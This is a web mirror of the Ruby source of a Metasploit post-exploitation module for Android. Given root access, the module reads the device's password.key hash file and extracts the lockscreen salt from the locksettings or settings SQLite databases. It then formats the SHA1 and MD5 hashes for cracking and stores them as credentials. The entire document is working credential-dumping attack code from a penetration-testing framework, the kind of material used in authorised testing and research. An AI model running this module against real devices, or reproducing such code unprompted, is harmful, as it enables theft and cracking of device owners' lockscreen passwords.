CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/android/gather/hashdump.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'sqlite3'6require 'fileutils'78class MetasploitModule < Msf::Post910include Msf::Post::File11include Msf::Post::Android::Priv1213def initialize(info = {})14super(15update_info(16info,17{18'Name' => 'Android Gather Dump Password Hashes for Android Systems',19'Description' => %q{20Post Module to dump the password hashes for Android System. Root is required.21To perform this operation, two things are needed. First, a password.key file22is required as this contains the hash but no salt. Next, a sqlite3 database23is needed (with supporting files) to pull the salt from. Combined, this24creates the hash we need. Samsung based devices change the hash slightly.25},26'License' => MSF_LICENSE,27'Author' => ['h00die', 'timwr'],28'SessionTypes' => [ 'meterpreter', 'shell' ],29'Platform' => 'android',30'References' => [31['URL', 'https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/'],32['URL', 'https://hashcat.net/forum/thread-2202.html'],33]34}35)36)37end3839def read_store_sql(location)40# we need the .db file, as well as the supporting files .db-shm and .db-wal as they may contain41# the values we are looking for42db_loot_name = ''43file_name = File.basename(location)44['', '-wal', '-shm'].each do |ext|45l = location + ext46unless file_exist?(l)47next48end4950f = file_name + ext51data = read_file(l)52if data.blank?53print_error("Unable to read #{l}")54return55end56print_good("Saved #{f} with length #{data.length}")5758if ext == ''59loot_file = store_loot('SQLite3 DB', 'application/x-sqlite3', session, data, f, 'Android database')60db_loot_name = loot_file61next62end6364loot_file = store_loot('SQLite3 DB', 'application/binary', session, data, f, 'Android database')6566# in order for sqlite3 to see the -wal and -shm support files, we have to rename them67# we have to do this since the ext is > 368# https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L39169new_name = "#{db_loot_name}#{ext}"70FileUtils.mv(loot_file, new_name)71end72SQLite3::Database.new(db_loot_name)73end7475def run76unless is_root?77fail_with Failure::NoAccess, 'This module requires root permissions.'78end7980manu = cmd_exec('getprop ro.product.manufacturer')8182print_status('Attempting to determine unsalted hash.')83key_file = '/data/system/password.key'84unless file_exist?(key_file)85print_error('No password.key file, no password on device.')86return87end8889hash = read_file(key_file)90if hash.empty?91print_error("Unable to read #{key_file}, and retrieve hash.")92return93end94store_loot('Key', 'plain/text', session, hash, 'password.key', 'Android password hash key')95print_good('Saved password.key')9697print_status('Attempting to determine salt')98os = cmd_exec('getprop ro.build.version.release')99vprint_status("OS Version: #{os}")100101locksettings_db = '/data/system/locksettings.db'102locksettings_sql = "select value from locksettings where name='lockscreen.password_salt';"103unless file_exist? locksettings_db104vprint_status("Could not find #{locksettings_db}, using settings.db")105locksettings_db = '/data/data/com.android.providers.settings/databases/settings.db'106locksettings_sql = "select value from secure where name='lockscreen.password_salt';"107end108109begin110vprint_status("Attempting to load lockscreen db: #{locksettings_db}")111db = read_store_sql(locksettings_db)112if db.nil?113print_error('Unable to load settings.db file.')114return115end116salt = db.execute(locksettings_sql)117rescue SQLite3::SQLException118print_error("Failed to pull salt from database. Command output: #{salt}")119return120end121122salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative.123124# convert from number string to hex and lowercase125salt = salt.to_i126salt += 2**64 if salt < 0 # deal with negatives127salt = salt.to_s(16)128print_good("Password Salt: #{salt}")129130sha1 = hash[0...40]131sha1 = "#{sha1}:#{salt}"132print_good("SHA1: #{sha1}")133credential_data = {134# no way to tell them apart w/o knowing one is samsung or not.135jtr_format: manu =~ /samsung/i ? 'android-samsung-sha1' : 'android-sha1',136origin_type: :session,137post_reference_name: refname,138private_type: :nonreplayable_hash,139private_data: sha1,140session_id: session_db_id,141username: '',142workspace_id: myworkspace_id143}144create_credential(credential_data)145146if hash.length > 40 # devices other than Samsungs have sha1+md5 combined into a single string147md5 = hash[40...72]148md5 = "#{md5}:#{salt}"149print_good("MD5: #{md5}")150credential_data = {151jtr_format: Metasploit::Framework::Hashes.identify_hash(md5),152origin_type: :session,153post_reference_name: refname,154private_type: :nonreplayable_hash,155private_data: md5,156session_id: session_db_id,157username: '',158workspace_id: myworkspace_id159}160create_credential(credential_data)161end162end163end164165166